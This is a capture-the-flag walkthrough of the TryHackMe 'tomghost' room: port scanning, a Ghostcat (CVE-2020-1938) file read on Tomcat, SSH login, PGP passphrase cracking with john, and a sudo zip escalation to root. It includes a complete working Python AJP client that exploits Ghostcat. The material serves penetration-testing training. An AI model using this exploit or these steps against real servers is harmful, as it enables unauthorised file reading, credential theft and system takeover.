tomghost
Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.

As the description says, this is an Easy room on TryHackMe. Initial access is easy, but the privilege escalation part is quite tricky.
Enumeration
1) First, a full port scan with masscan: masscan -e eth0 -p 1-65535 --rate=10000 -v 10.10.187.215
Discovered open port 22/tcp on 10.10.187.215
Discovered open port 8080/tcp on 10.10.187.215
Discovered open port 53/tcp on 10.10.187.215
Discovered open port 8009/tcp on 10.10.187.215
2) Then a service and script scan with nmap on the discovered ports: nmap -p 22,8080,53,8009 -sC -sV -v 10.10.187.215
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (EdDSA)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.30
Tomcat 9.0.30 with the AJP connector exposed on 8009 is vulnerable to Ghostcat (CVE-2020-1938): an unauthenticated client can make the AJP connector read arbitrary files under the web application root, such as WEB-INF/web.xml: exploit-db
3) Visiting the webpage at port 8080 confirms the version:

4) Found a tool (ajpShooter) that reads files through this AJP vulnerability: GitHub Link
5) Make the tool executable, then run it:

./ajpShooter.py http://10.10.187.215:8080 8009 /WEB-INF read
http://10.10.187.215:8080 : the address where Tomcat's HTTP service runs (host and port go into the crafted request)
8009 : the AJP (Jserv) port the crafted request is sent to
/WEB-INF : the path to request from the web application
read : read the resource and print it
This reveals /index.txt.
6) Next, read the deployment descriptor, a common place to find credentials:
./ajpShooter.py http://10.10.187.215:8080 8009 /WEB-INF/web.xml read
web.xml contains a username:password pair
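As an added illustration of what the tool is doing on the wire, here is a minimal AJP13 client that sends the Ghostcat request and parses the answer. This is my own example code, not ajpShooter and not part of the room; the host, ports and file path are the ones from the writeup, the request URI "/" and the remote address 127.0.0.1 are arbitrary filler, and the parser handles only the three response packet types a file read produces.

```python
import socket
import struct

# AJP13 prefix codes used by a file read (request side and response side)
FORWARD_REQUEST, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE = 2, 3, 4, 5
METHOD_GET, REQ_ATTRIBUTE, ATTR_END = 2, 0x0A, 0xFF

# Coded response header names from the AJP13 spec (0xA0xx)
RESPONSE_HEADER_CODES = {
    0xA001: "Content-Type", 0xA002: "Content-Language", 0xA003: "Content-Length",
    0xA004: "Date", 0xA005: "Last-Modified", 0xA006: "Location", 0xA007: "Set-Cookie",
    0xA008: "Set-Cookie2", 0xA009: "Servlet-Engine", 0xA00A: "Status", 0xA00B: "WWW-Authenticate",
}


def ajp_string(value):
    """AJP string: uint16 length, bytes, NUL terminator; None encodes as 0xFFFF."""
    if value is None:
        return b"\xff\xff"
    raw = value.encode()
    return struct.pack(">H", len(raw)) + raw + b"\x00"


def build_forward_request(target_file, server_name, server_port=8080, req_uri="/"):
    """Forward Request whose javax.servlet.include.* attributes make DefaultServlet
    serve target_file. The URI is harmless filler; the attributes are the bug."""
    body = bytes([FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1")
    body += ajp_string(req_uri)
    body += ajp_string("127.0.0.1")          # remote_addr (filler, assumed)
    body += ajp_string(None)                 # remote_host
    body += ajp_string(server_name)          # server_name
    body += struct.pack(">H", server_port)   # server_port
    body += b"\x00"                          # is_ssl = false
    body += struct.pack(">H", 0)             # num_headers = 0
    for name, value in (
        ("javax.servlet.include.request_uri", "/"),
        ("javax.servlet.include.servlet_path", "/"),
        ("javax.servlet.include.path_info", target_file),
    ):
        body += bytes([REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([ATTR_END])
    return b"\x12\x34" + struct.pack(">H", len(body)) + body


def _read_string(buf, pos):
    length = struct.unpack(">H", buf[pos:pos + 2])[0]
    if length == 0xFFFF:
        return None, pos + 2
    start = pos + 2
    return buf[start:start + length].decode(errors="replace"), start + length + 1


def parse_response(data):
    """Walk the 'AB'-framed response packets; return (status, headers, body)."""
    status, headers, body, pos = None, {}, b"", 0
    while pos + 4 <= len(data):
        if data[pos:pos + 2] != b"AB":
            raise ValueError("bad AJP response magic at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        packet = data[pos + 4:pos + 4 + length]
        pos += 4 + length
        if packet[0] == SEND_HEADERS:
            status = struct.unpack(">H", packet[1:3])[0]
            _msg, p = _read_string(packet, 3)
            count = struct.unpack(">H", packet[p:p + 2])[0]
            p += 2
            for _ in range(count):
                code = struct.unpack(">H", packet[p:p + 2])[0]
                if code in RESPONSE_HEADER_CODES:       # coded header name
                    name, p = RESPONSE_HEADER_CODES[code], p + 2
                else:                                   # literal header name
                    name, p = _read_string(packet, p)
                value, p = _read_string(packet, p)
                headers[name] = value
        elif packet[0] == SEND_BODY_CHUNK:
            chunk_len = struct.unpack(">H", packet[1:3])[0]
            body += packet[3:3 + chunk_len]             # Tomcat appends a NUL; ignore it
        elif packet[0] == END_RESPONSE:
            break
    return status, headers, body


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        part = sock.recv(n - len(buf))
        if not part:
            raise ConnectionError("AJP connection closed mid-packet")
        buf += part
    return buf


def ghostcat_read(host, target_file="/WEB-INF/web.xml", ajp_port=8009, server_port=8080):
    """Send the crafted request to the AJP port and return (status, headers, body)."""
    with socket.create_connection((host, ajp_port), timeout=10) as sock:
        sock.sendall(build_forward_request(target_file, host, server_port))
        data = b""
        while True:                      # read packet by packet until END_RESPONSE
            header = _recv_exact(sock, 4)
            packet = _recv_exact(sock, struct.unpack(">H", header[2:4])[0])
            data += header + packet
            if packet[0] == END_RESPONSE:
                break
    return parse_response(data)
```

Against the room machine, `ghostcat_read("10.10.187.215")` returns the status, the response headers and the bytes of WEB-INF/web.xml. The fix on the Tomcat side was to stop trusting these request attributes from AJP clients and to require a secret on the connector; anything that can reach 8009 without that secret can read whatever the web application can.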

Exploitation
7) The credentials from web.xml work directly over SSH: ssh skyfuck@10.10.187.215

8) user.txt is not in skyfuck's home but in another user's home directory, which is readable from skyfuck's account

Privilege escalation
9) Failed attempts
sudo -l: skyfuck has no sudo rights
/etc/shadow and /etc/passwd are not writable
could not download or run any enumeration automation on the box
(the other user, merlin, does have sudo rights, but there is no direct path to that account yet)
10) Other enumeration got nowhere, but skyfuck's home directory holds a PGP-encrypted file (credential.pgp) and an ASCII-armoured key file (tryhackme.asc)

11) Import the ASCII-armoured key, then try to decrypt the PGP file:
gpg --import tryhackme.asc
gpg --decrypt credential.pgp
The imported private key is passphrase-protected, so decryption prompts for a passphrase that we do not have.

12) Copy the .asc file to the attack box and convert it into a crackable hash with gpg2john:
Download:
scp skyfuck@10.10.187.215:tryhackme.asc /tmp
Convert:
/opt/john/gpg2john /tmp/tryhackme.asc > /tmp/hash

13) Crack the passphrase with john: john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hash

14) Enter the cracked passphrase at the gpg --decrypt prompt in the other shell on the target. The decrypted credential.pgp reveals merlin's password.

15) Switch to merlin with the recovered password: su merlin
sudo -l shows merlin may run zip with sudo
16) GTFOBins lists a sudo payload for zip; with a small modification it drops into a root shell.
